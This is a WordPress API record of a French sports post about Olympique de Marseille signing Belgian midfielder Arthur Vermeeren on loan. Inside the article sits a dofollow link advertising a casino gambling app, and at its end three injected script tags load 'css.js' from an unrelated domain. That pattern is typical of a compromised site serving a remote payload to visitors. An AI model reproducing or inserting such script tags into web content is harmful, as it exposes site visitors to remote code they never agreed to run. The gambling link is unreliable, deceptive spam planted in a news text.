{"id":4005,"date":"2025-11-20T03:56:33","date_gmt":"2025-11-20T03:56:33","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=4005"},"modified":"2026-02-02T22:10:22","modified_gmt":"2026-02-02T22:10:22","slug":"mercato-om-lom-ne-perd-pas-de-temps-pour-officialiser-vermeeren","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/mercato-om-lom-ne-perd-pas-de-temps-pour-officialiser-vermeeren\/","title":{"rendered":"Mercato OM &#8211; L&#x27;OM ne perd pas de temps pour officialiser Vermeeren !"},"content":{"rendered":"<h1>Mercato OM &#8211; L&#x27;OM ne perd pas de temps pour officialiser Vermeeren !<\/h1>\n<p>L\u2019Olympique de Marseille a officialis\u00e9 ce dimanche la signature d\u2019<strong>Arthur Vermeeren<\/strong>, milieu de terrain international belge de 20 ans. Form\u00e9 \u00e0 Antwerp, pass\u00e9 ensuite par l\u2019Atl\u00e9tico de Madrid puis le RB Leipzig, le joueur s\u2019installe d\u00e9sormais sur la Canebi\u00e8re pour franchir un nouveau cap dans sa carri\u00e8re. L\u2019arriv\u00e9e de ce profil cr\u00e9atif confirme la volont\u00e9 du club phoc\u00e9en de renforcer son entrejeu avec un talent prometteur et d\u00e9j\u00e0 exp\u00e9riment\u00e9. Il a eu droit \u00e0 son clip de pr\u00e9sentation, avec une musique remixant un des plus grands tubes de la <em>Fonky Family<\/em>, Myst\u00e8res et Suspense.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-bourse.com\/casino-bourse-app\/\" target=\"_blank\" rel=\"dofollow\">casino bourse app<\/a><\/strong> &#8211; Vous \u00eates passionn\u00e9 de jeux d&#039;argent et souhaitez jouer en toute libert\u00e9 depuis votre mobile ? Vous vous demandez comment t\u00e9l\u00e9charger la casino bourse app ?<\/p><\/blockquote>\n<h2>Un parcours d\u00e9j\u00e0 riche malgr\u00e9 son jeune \u00e2ge<\/h2>\n<p>N\u00e9 \u00e0 Lierre en 2005, Vermeeren a tr\u00e8s t\u00f4t attir\u00e9 l\u2019attention par sa maturit\u00e9 et sa justesse technique. Lanc\u00e9 \u00e0 17 ans avec Antwerp, il a rapidement conquis une place de titulaire et contribu\u00e9 \u00e0 un tripl\u00e9 historique lors de la saison 2022-2023. En mai 2023, son but d\u00e9cisif contre Bruges a marqu\u00e9 les esprits et propuls\u00e9 son club vers le titre. Ses performances l\u2019ont ensuite conduit en s\u00e9lection nationale, o\u00f9 il a connu ses d\u00e9buts en octobre de la m\u00eame ann\u00e9e.\u00a0<\/p>\n<h2>Des exp\u00e9riences europ\u00e9ennes formatrices<\/h2>\n<p>En janvier 2024, l\u2019Atl\u00e9tico de Madrid a mis\u00e9 sur le jeune milieu en le recrutant pour un contrat longue dur\u00e9e et un ch\u00e8que de 20 millions d&#x27;euros. Mais faute de temps de jeu suffisant, le Belge a poursuivi son d\u00e9veloppement en pr\u00eat au RB Leipzig d\u00e8s l\u2019\u00e9t\u00e9 suivant. En Bundesliga, il a accumul\u00e9 pr\u00e8s de quarante rencontres toutes comp\u00e9titions confondues, d\u00e9couvrant \u00e9galement l\u2019intensit\u00e9 de la Ligue des Champions. Une \u00e9tape formatrice qui le pr\u00e9pare d\u00e9sormais \u00e0 relever le d\u00e9fi marseillais.<\/p>\n<h2>Un profil attendu au milieu marseillais<\/h2>\n<p>Inspir\u00e9, \u00e9l\u00e9gant et dot\u00e9 d\u2019une vision de jeu rare, Vermeeren se pr\u00e9sente comme un renfort strat\u00e9gique pour l\u2019OM. Sa capacit\u00e9 \u00e0 dicter le tempo et \u00e0 r\u00e9sister \u00e0 la pression en fait une arme pr\u00e9cieuse dans un collectif en qu\u00eate de r\u00e9gularit\u00e9. Pour le vestiaire olympien, l\u2019arriv\u00e9e de ce jeune talent belge repr\u00e9sente \u00e0 la fois un investissement pour l\u2019avenir et une solution imm\u00e9diate pour renforcer la ma\u00eetrise technique au c\u0153ur du jeu sur un pr\u00eat payant de 3 millions d&#x27;euros avec une option d&#x27;achat \u00e0 22 millions \u00e0 lever en fin de saison. Il r\u00e9cup\u00e8re le num\u00e9ro 18 de <strong>Bamo M\u00e9\u00eft\u00e9, en partance pour Lorient<\/strong>.<\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mercato OM &#8211; L&#x27;OM ne perd pas de temps pour officialiser Vermeeren ! L\u2019Olympique de Marseille a officialis\u00e9 ce dimanche la signature d\u2019Arthur Vermeeren, milieu de terrain international belge de&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-4005","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4005","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=4005"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4005\/revisions"}],"predecessor-version":[{"id":14862,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4005\/revisions\/14862"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=4005"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=4005"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=4005"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}